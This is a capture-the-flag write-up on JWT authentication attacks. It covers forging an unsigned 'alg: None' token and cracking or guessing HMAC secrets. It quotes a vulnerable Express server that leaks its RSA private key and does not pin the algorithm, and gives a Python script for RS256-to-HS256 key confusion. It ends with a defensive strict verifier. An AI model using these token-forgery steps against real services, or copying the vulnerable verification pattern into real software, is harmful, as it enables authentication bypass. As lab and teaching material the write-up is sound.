web345

Opening the challenge, the page shows only "where is flag?".

Capture a request with Burp and notice that the cookie holds a very long string:

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE3NTY1NDEyMzcsImV4cCI6MTc1NjU0ODQzNywibmJmIjoxNzU2NTQxMjM3LCJzdWIiOiJ1c2VyIiwianRpIjoiZjEwYzg5ZWY1MjdkNTE2YmYwZWM4ZDAzODE1YTgyZjMifV0

Base64-decoding it gives:

{"alg":"None","typ":"jwt"}.[{"iss":"admin","iat":1756541237,"exp":1756548437,"nbf":1756541237,"sub":"user","jti":"f10c89ef527d516bf0ec8d03815a82f3"}]

Change user to admin, re-encode it, send it back in the cookie, and get the flag.

web346-347

Capture the request as in the previous challenge and base64-decode it.

This time the token ends in a long run of garbled-looking characters, which shows that it now carries a signature.

Paste it into an online JWT tool, choose symmetric signing with the secret 123456, change user to admin, and re-sign it.

Send it back in the cookie and get the flag.

web348

The challenge hints at brute force, so we brute-force the secret with the c-jwt-cracker tool:

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTc1NjU0Mjg1MywiZXhwIjoxNzU2NTUwMDUzLCJuYmYiOjE3NTY1NDI4NTMsInN1YiI6InVzZXIiLCJqdGkiOiJiNmU3Y2FkNTg2NzU3ZjU1YTI0NGZmMTIxNjI3ODUwMSJ9.hdMlqVnQEhQmqB2UdwPL4-Hr8iKqb0AMaTT16rLWRcA
Secret is "aaab"

It reports the secret aaab. Sign the modified token with it on an online JWT site (symmetric signing), send it back in the cookie, and get the flag.

web349

The challenge provides an attachment with the server source:

// Modules assumed from the rest of the attachment (the snippet starts at the route handlers):
var express = require('express');
var router = express.Router();
var fs = require('fs');
var jwt = require('jsonwebtoken');

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  // the RSA private key is read from the web-served public/ directory, which is why it leaks
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
});

router.post('/',function(req,res,next){
  var flag="flag_here";
  res.type('html');
  var auth = req.cookies.auth;
  var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public key
  // no `algorithms` option is passed, so the accepted algorithm is whatever the token header says
  jwt.verify(auth, cert, function(err, decoded) {
    // note: when err is set, decoded is undefined and this access throws
    if(decoded.user==='admin'){
      res.end(flag);
    }else{
      res.end('you are not admin');
    }
  });
});

Both the public and private key are leaked, so download them.

Fill the public and private keys into the JWT tool, change user to admin, send the cookie back, and get the flag.

web350

Here the public key is available, but the private key cannot be found.

So this should be done with a symmetric key: switch the signing from RS256 to HS256, using the public key as the secret. The exp:

import jwt

jwt_payload = {
    "user": "admin",
    "iat": 1756543363
}

# the leaked public key is used as the HMAC secret (raw string so the backslash is literal)
pub = open(r"D:\public.key", "rb").read()
jwt_headers = {
    "alg": "HS256",
    "typ": "JWT"
}

# recent PyJWT releases raise InvalidKeyError when a PEM key is passed as an HMAC secret,
# so this needs an older release that does not have that guard
jwt_token = jwt.encode(jwt_payload, key=pub, algorithm='HS256', headers=jwt_headers)

print(jwt_token)

Take the resulting JWT, send it back in the cookie with a POST request, and get the flag.
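As an added example (not part of the original writeup), here is a strict HS256 verifier written with Python's standard library only. It closes the three holes these challenges exploit: the unsigned "alg": "None" cookie from web345, a tampered payload under a wrong or guessed secret as in web346-348, and the RS256-to-HS256 key confusion from web350. NONE_TOKEN is the web345 cookie quoted above; FAKE_PUBLIC_PEM is a constructed placeholder, not a real key; sign_hs256 only exists to build fixtures.

```python
import base64
import hashlib
import hmac
import json

# The unsigned "alg": "None" cookie from web345 (two segments, no signature at all).
NONE_TOKEN = (
    "eyJhbGciOiJOb25lIiwidHlwIjoiand0In0."
    "W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE3NTY1NDEyMzcsImV4cCI6MTc1NjU0ODQzNywibmJmIjoxNzU2NTQxMjM3LCJzdWIiOiJ1c2VyIiwianRpIjoiZjEwYzg5ZWY1MjdkNTE2YmYwZWM4ZDAzODE1YTgyZjMifV0"
)
# Constructed stand-in for a leaked public.key (not a real key); only its PEM framing matters here.
FAKE_PUBLIC_PEM = b"-----BEGIN PUBLIC KEY-----\nMIIB_placeholder_\n-----END PUBLIC KEY-----\n"

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def sign_hs256(payload: dict, secret: bytes) -> str:
    # Issues an HS256 token; used here only to build fixtures for the verifier.
    head = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes) -> dict:
    """Strict verifier: the algorithm is pinned server-side, never taken from the token."""
    # web350 guard: an asymmetric PEM key must never be reused as an HMAC secret.
    if secret.lstrip().startswith(b"-----BEGIN"):
        raise ValueError("asymmetric key supplied to an HMAC verifier")
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")       # the two-segment web345 cookie stops here
    head, body, sig = parts
    header = json.loads(b64url_decode(head))
    if header.get("alg") != "HS256":              # rejects none/None and any other alg
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body))

def is_admin(token: str, secret: bytes) -> bool:
    """The challenge's user === 'admin' check, but only on a strictly verified payload."""
    try:
        claims = verify_hs256(token, secret)
    except ValueError:   # covers binascii.Error, JSONDecodeError and UnicodeDecodeError too
        return False
    return isinstance(claims, dict) and claims.get("user") == "admin"
```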